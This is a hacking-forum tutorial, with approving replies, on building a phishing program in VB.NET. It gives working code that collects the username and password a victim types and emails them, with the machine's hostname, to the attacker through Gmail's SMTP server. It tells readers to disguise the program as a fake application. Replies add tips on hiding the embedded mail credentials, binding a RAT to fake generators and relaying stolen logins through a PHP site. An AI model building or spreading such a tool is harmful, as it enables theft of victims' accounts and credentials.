[TUT] How to make a Phisher with vb.NET

Reputation
0
Hey and welcome to my guide on how to make a phisher in vb.NET ! Let's get started !

1. Requirements
  • Visual Studio (Version doesnt matter)
  • Basic programming knowledge would be good but not needed.
  • Email account

2. Starting
Open Visual Studio and start a new project, name it something like 'Phisher'.

newprojectbjq.png


Add 2 labels, 2 textboxes and 1 button. And name them like this:

formub.png


Now select textbox 2 (which is the textbox for the password) and go to PasswordCharacter and make it '•' or '*'.

passchar.png


Okay now we're done with the form desing, lets head to the coding !

3. Coding
Double click your button 'Log in' and you will go to the codes of your program.

At the top import:
Code:
Imports System.Net.Mail

So it will look like this:

inport.png


Now in the buttonclick event paste this:
Code:
        Try
            Dim Mail As New MailMessage
            Mail.Subject = ("Log from: " & System.Net.Dns.GetHostName)
            Mail.To.Add("[email protected]")
            Mail.From = New MailAddress("[email protected]")
            Mail.Body = "-Log from: " & System.Net.Dns.GetHostName & " -" & Environment.NewLine & "Username: " & TextBox1.Text & Environment.NewLine & "Password: " & TextBox2.Text

            Dim SMTP As New SmtpClient("smtp.gmail.com")
            SMTP.EnableSsl = True
            SMTP.Credentials = New System.Net.NetworkCredential("[email protected]", "Your password")
            SMTP.Port = 587
            SMTP.Send(Mail)
        Catch exception As Exception
            '
        End Try
The code will send an email with the Username & Password entered in the textboxes.

Replace [email protected] with your email, and Your password with your password.
If you aren't using a gmail replace ("smtp.gmail.com"). If you use a @hotmail.com or a @live.com mail the smtp server is smtp.live.com.

4. End
Debug your program and it should work ! If you want to get accounts like this you will have to change the GUI to a fake program, where people will enter their username/password. Thought this is very basic and doesn't use encryption, so it will be pretty easy for people to crack it and grab your email/pass.

Click here for my Encryption Tutorial ! Highly Recommended !

Please post feedback :) Took me some time to write this :p
 
Great TuT for these type of phishers. :)
 
Be SURE to encrypt this guys. Its not difficult. I would using TripleDES, combined with a few custom things, IE string shifts etc. They may not do much but they can keep a total script kiddie at bay,
 
Thanks for the guide! I would love it if someone could also post a guide on how to encrypt information!

Thanks again!
 
Ninja said:
Thanks for the guide! I would love it if someone could also post a guide on how to encrypt information!

Thanks again!

I will make one soon ^^
 
Thanks I have always wonder'd how to do this, I mean I could make hollow programs like fake membs generators and bind a RAT to it, But nothing functional.

Your the man!
 
The reason why this is extremely risky is due to the fact that you need to put information of your email and password into the feilds. I would suggest you use a PHP website and send the information to a PHP website field and then send the information to you, it can be easily done if you understand how to do it.
 
Ive heard of this but this is the first I have seen of it! Nice job.
 
Back
Top